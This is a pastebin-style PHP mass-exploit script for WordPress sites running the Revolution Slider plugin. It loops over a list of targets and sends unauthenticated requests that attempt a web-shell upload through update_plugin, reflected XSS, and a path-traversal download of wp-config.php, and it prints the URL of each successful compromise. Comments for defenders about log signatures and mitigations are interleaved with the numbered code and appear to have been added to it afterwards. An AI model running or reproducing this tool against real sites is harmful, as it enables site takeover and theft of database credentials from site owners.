
Untitled

a guest Oct 12th, 2017 144 Never
  1. <?php
  2. /** me@dwisiswanto.my.id **/
  3.  
  4. /******************************************
  5.  First, install PHP CLI
  6.  USAGE: php exploit.php list-of-target.txt
  7. ******************************************/
  8.  
  // Probe inputs shared by the requests further down; each value is sent unchanged in a POST field:
  //   file - a zip file name, sent as the update_file field of the update_plugin request
  //   xss  - an HTML marker string, sent to see whether the plugin echoes markup back
  //   kfg  - a relative path to wp-config.php, sent as the img field of revslider_show_image
  // Defender note: the marker text and the "..\wp-config.php" value are literal strings worth
  // searching for wherever request bodies are recorded (WAF or audit logs).
  9. $cafc = array(
  10.     "file"=>"revslider.zip", // enter a ur shell file into a zip
  11.     "xss"=>"<marquee>CaFc Versace was Here", // for xss
  12.     "kfg"=>"..\wp-config.php" // for download config
  13. );
  14.  
  /**
   * HTTP helper built on cURL: requests $yuerel and returns the response body.
   *
   * @param string $yuerel   URL to request.
   * @param mixed  $dataAing Optional POST fields. When the value is not loosely equal to null the
   *                         request is sent as a POST with these fields; otherwise no POST options
   *                         are set. The callers in this file pass arrays, which PHP's cURL
   *                         extension encodes as multipart/form-data.
   * @return string|false    Response body, or false when curl_exec() fails.
   *
   * Security notes for reviewers:
   *  - CURLOPT_SSL_VERIFYPEER is false, so the peer certificate is not verified and an HTTPS
   *    response cannot be trusted to come from the named host.
   *  - CURLOPT_FOLLOWLOCATION is true, so the body returned may come from a redirect target.
   *  - No cookie, credential or User-Agent option is set: every request is unauthenticated, and
   *    libcurl sends no User-Agent header unless one is configured. A multipart POST to
   *    admin-ajax.php without a User-Agent is therefore a plausible log signal (confirm against
   *    your own traffic before alerting on it).
   */
  15. function hajar($yuerel, $dataAing=null) {
  16.     $cuih = curl_init();
  17.     curl_setopt($cuih, CURLOPT_URL, $yuerel);
  18.     if ($dataAing != null){
  19.         curl_setopt($cuih, CURLOPT_POST, true);
  20.         curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing);
  21.     }
  22.     curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true);
  23.     curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true);
  24.     curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false);
  25.     $eks = curl_exec($cuih);
  26.     curl_close($cuih);
  27.     return $eks;
  28. }
  29.  
  // Driver: reads the file named by the first CLI argument, splits it on CRLF into one base URL
  // per entry, and sends four POST requests per entry to <base>/wp-admin/admin-ajax.php.
  // None of the POST arrays below carries a cookie or nonce, so each request checks whether a
  // revslider AJAX handler answers without authentication.
  //
  // Defender summary (all request fields are taken from the code below):
  //   - Log/WAF signatures: POSTs to admin-ajax.php with action=revslider_ajax_action and
  //     client_action=update_plugin or get_captions_css, client_action values containing markup,
  //     and action=revslider_show_image with an img value that contains ".." or names a .php file.
  //   - Mitigation: run a current vendor release of the slider plugin (check copies bundled with
  //     themes as well), and block the request shapes above at the edge until that is confirmed.
  30. $site = @file_get_contents($argv[1]);
  31. $tumbal = explode("\r\n", $site);
  32. echo "Calculate the target list : " . count($tumbal);
  33. if (!isset($site)) {
  34.     echo "Site N/A.";
  35. } else {
  36.     foreach ($tumbal as $uri) {
  37.         echo "\n------------------------------------";
  38.         echo "\nTarget => " . $uri;
  39.         echo "\n";
          // Probe 1 - update_plugin: posts a file name in update_file. SUCCESS is printed only when
          // the JSON reply has a truthy success field and a message other than "Wrong request".
          // Incident-response note: the directory printed on success
          // (wp-content/plugins/revslider/temp/update_extract/revslider/) is where to look for
          // unexpected PHP files; denying PHP execution there limits the impact of a planted file.
  40.         $menta = hajar($uri . "/wp-admin/admin-ajax.php", array(
  41.             "action" => "revslider_ajax_action",
  42.             "client_action" => "update_plugin",
  43.             "update_file" => $cafc['file'])
  44.         );
  45.         $jason = json_decode($menta, true);
  46.         if ($jason['success'] == false || $jason['message'] == "Wrong request") {
  47.             echo "\nExploit [update_plugin] => NOT VULNERABLE";
  48.         } else {
  49.             echo "\nExploit [update_plugin] => SUCCESS";
  50.             echo "\n[+] " . $uri . "/wp-content/plugins/revslider/temp/update_extract/revslider/YOUR_FILE.php\n";
  51.         }
  52.  
          // Probe 2 - get_captions_css: posts the HTML marker in the data field. SUCCESS is printed
          // only on a truthy success field in the JSON reply.
          // Detection note: a data value containing markup on this action is not expected from a
          // normal visitor; the handler should require an authenticated, nonce-checked request.
  53.         $menta2 = hajar($uri . "/wp-admin/admin-ajax.php", array(
  54.             "action" => "revslider_ajax_action",
  55.             "client_action" => "get_captions_css",
  56.             "data" => $cafc['xss'])
  57.         );
  58.         $jasonB = json_decode($menta2, true);
  59.         if ($jasonB['success'] == false || $jason['message'] == "Wrong request") {
  60.             echo "\nExploit [get_captions_css] => NOT VULNERABLE";
  61.         } elseif ($jasonB['success'] == true) {
  62.             echo "\nExploit [get_captions_css] => SUCCESS";
  63.             echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
  64.             echo "action=revslider_ajax_action&";
  65.             echo "client_action=get_captions_css";
  66.             echo "data=" . urlencode($cafc['xss']) . "\n";
  67.         }
  68.  
          // Probe 3 - error-message check: the marker is sent as the client_action name itself, and
          // SUCCESS is printed when the reply's message matches /wrong ajax action/i.
          // NOTE(review): presumably the error message echoes the supplied action name; confirm
          // against the plugin source. The server-side fix is to escape any echoed input and serve
          // the reply with a JSON content type so a browser never renders it as HTML.
  69.         $menta3 = hajar($uri . "/wp-admin/admin-ajax.php", array(
  70.             "action" => "revslider_ajax_action",
  71.             "client_action" => $cafc['xss'])
  72.         );
  73.         $jasonC = json_decode($menta3, true);
  74.         if (preg_match("/wrong ajax action/i", $jasonC['message'])) {
  75.             echo "\nExploit [xss] => SUCCESS";
  76.             echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
  77.             echo "action=revslider_ajax_action";
  78.             echo "client_action=" . urlencode($cafc['xss']) . "\n";
  79.         } else {
  80.             echo "\nExploit [xss] => NOT VULNERABLE";
  81.         }
  82.  
          // Probe 4 - revslider_show_image: posts the relative wp-config.php path in img. Any reply
          // other than "empty image", "image file not found" or a value loosely equal to 0 is
          // reported as SUCCESS.
          // Incident-response note: if logs show this action answered with a non-image body, treat
          // the database credentials and the keys/salts stored in wp-config.php as exposed and
          // rotate them. A filter that rejects img values containing ".." covers this request.
  83.         $menta4 = hajar($uri . "/wp-admin/admin-ajax.php", array(
  84.             "action" => "revslider_show_image",
  85.             "img" => $cafc['kfg']),
  86.         $uri);
  87.         if ($menta4 == "empty image" || $menta4 == "image file not found" || $menta4 == 0) {
  88.             echo "\nExploit [wp-config] => NOT VULNERABLE\n";
  89.         } else {
  90.             echo "\nExploit [wp-config] => SUCCESS";
  91.             echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
  92.             echo "action=revslider_show_image";
  93.             echo "img=" . $cafc['kfg'] . "\n";
  94.         }
  95.     }
  96. }
  97. ?>
  98. -------------------------------------------------------------------------------------
  99.  
  100.  
  101. # Credits :
  102. -------------------------------------------------------------------------------------
  103. CaFc Versace
  104. Thanks : Agency CaFc - Surabaya BlackHat
  105. -------------------------------------------------------------------------------------
  106.  
  107.  
  108. ./learn to be better